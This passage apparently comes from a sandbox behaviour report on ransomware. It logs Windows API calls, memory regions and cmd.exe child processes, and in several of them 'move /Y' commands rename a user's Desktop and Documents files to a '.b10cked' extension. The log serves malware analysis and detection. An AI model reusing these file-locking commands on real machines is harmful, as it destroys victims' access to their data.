lpFilePart=0x26ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", lpFilePart=0x26ef48*="VX2e_AgjuFQyd1Woq.bmp.b10cked") returned 0x36 [0232.134] SetErrorMode (uMode=0x0) returned 0x1 [0232.134] SetLastError 
(dwErrCode=0x0) [0232.134] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp.b10cked")) returned 0xffffffff [0232.134] GetLastError () returned 0x2 [0232.134] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x26e8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e8c4) returned 0x2b0e50 [0232.134] FindNextFileW (in: hFindFile=0x2b0e50, lpFindFileData=0x26e8c4 | out: lpFindFileData=0x26e8c4) returned 0 [0232.134] GetLastError () returned 0x12 [0232.135] FindClose (in: hFindFile=0x2b0e50 | out: hFindFile=0x2b0e50) returned 1 [0232.135] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2c1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1bd0) returned 0x2b0e50 [0232.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked", lpFilePart=0x0) returned 0x36 [0232.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", nBufferLength=0x104, lpBuffer=0x26eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", lpFilePart=0x0) returned 0x2e [0232.135] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp")) returned 0x20 [0232.136] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp.b10cked"), 
dwFlags=0x3) returned 1 [0232.136] FindClose (in: hFindFile=0x2b0e50 | out: hFindFile=0x2b0e50) returned 1 [0232.136] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eb10 | out: _Buffer=" 1") returned 9 [0232.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.136] GetFileType (hFile=0x7) returned 0x2 [0232.373] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.373] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea9c | out: lpMode=0x26ea9c) returned 1 [0232.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ead0 | out: lpConsoleScreenBufferInfo=0x26ead0) returned 1 [0232.373] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.374] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.374] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eaf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eaf4*=0x1a) returned 1 [0232.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.374] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.374] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.374] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.374] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.375] SetConsoleInputExeNameW () returned 0x1 [0232.375] GetConsoleOutputCP () returned 0x1b5 [0232.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0232.375] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.375] exit (_Code=0) Process: id = "615" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34425 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34426 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34427 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34428 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 34429 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34430 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 34431 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34432 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34433 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34434 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34637 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34638 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34639 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34640 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 34641 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34642 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34643 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 34644 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34645 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34646 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34647 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34648 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34649 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34650 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34729 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 34730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34731 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34732 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34733 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34734 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34735 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34736 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34737 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 34738 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 855 os_tid = 0xe7c [0231.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbf4 | out: lpSystemTimeAsFileTime=0x20fbf4*(dwLowDateTime=0xbdc67e60, dwHighDateTime=0x1d440a9)) [0231.896] GetCurrentProcessId () returned 0xe80 [0231.896] GetCurrentThreadId () returned 0xe7c [0231.896] GetTickCount () returned 0x3fcf4 [0231.896] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbec | out: lpPerformanceCount=0x20fbec*=28868485354) returned 1 [0231.897] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.897] __set_app_type (_Type=0x1) [0231.897] __p__fmode () returned 0x76b331f4 [0231.897] __p__commode () returned 0x76b331fc [0231.897] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.897] 
__getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.897] GetCurrentThreadId () returned 0xe7c [0231.897] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe7c) returned 0x38 [0231.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.897] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb84 | out: phkResult=0x20fb84*=0x0) returned 0x2 [0231.922] VirtualQuery (in: lpAddress=0x20fbbb, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb54, dwLength=0x1c | out: lpBuffer=0x20fb54*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb54, dwLength=0x1c 
| out: lpBuffer=0x20fb54*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.959] GetEnvironmentStringsW () returned 0x300168* [0231.959] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0231.959] GetEnvironmentStringsW () returned 0x300168* [0231.959] FreeEnvironmentStringsW (penv=0x300168) returned 1 [0231.959] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eaf4 | out: phkResult=0x20eaf4*=0x40) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x90, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x1, 
lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x0, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.959] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegCloseKey (hKey=0x40) returned 0x0 [0231.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eaf4 | out: phkResult=0x20eaf4*=0x40) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x40, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x1, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x0, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x4, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x4) returned 0x0 [0231.960] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eafc, lpData=0x20eb00, lpcbData=0x20eaf8*=0x1000 | out: lpType=0x20eafc*=0x0, lpData=0x20eb00*=0x9, lpcbData=0x20eaf8*=0x1000) returned 0x2 [0231.960] RegCloseKey (hKey=0x40) returned 0x0 [0231.960] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.960] srand (_Seed=0x5b8863bf) [0231.960] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" [0231.960] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"" [0231.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.961] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.961] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.961] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.961] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.961] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.961] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.961] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.961] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.962] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.962] GetEnvironmentStringsW () returned 0x3022b8* [0231.962] FreeEnvironmentStringsW (penv=0x3022b8) returned 1 [0231.962] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.962] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.962] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.962] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.962] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0231.962] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.962] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.962] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.962] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8c0, lpFilePart=0x20f8bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8bc*="Desktop") returned 0x18 [0231.962] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f63c | out: lpFindFileData=0x20f63c) returned 0x2ffff8 [0231.963] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0231.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.963] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.963] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.964] GetEnvironmentStringsW () returned 0x302ad8* [0231.964] FreeEnvironmentStringsW (penv=0x302ad8) returned 1 [0231.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0231.964] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fa00, cchData=128 | out: lpLCData="0") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fa00, cchData=128 | out: lpLCData="0") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fa00, cchData=128 | out: lpLCData="1") returned 2 [0231.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, 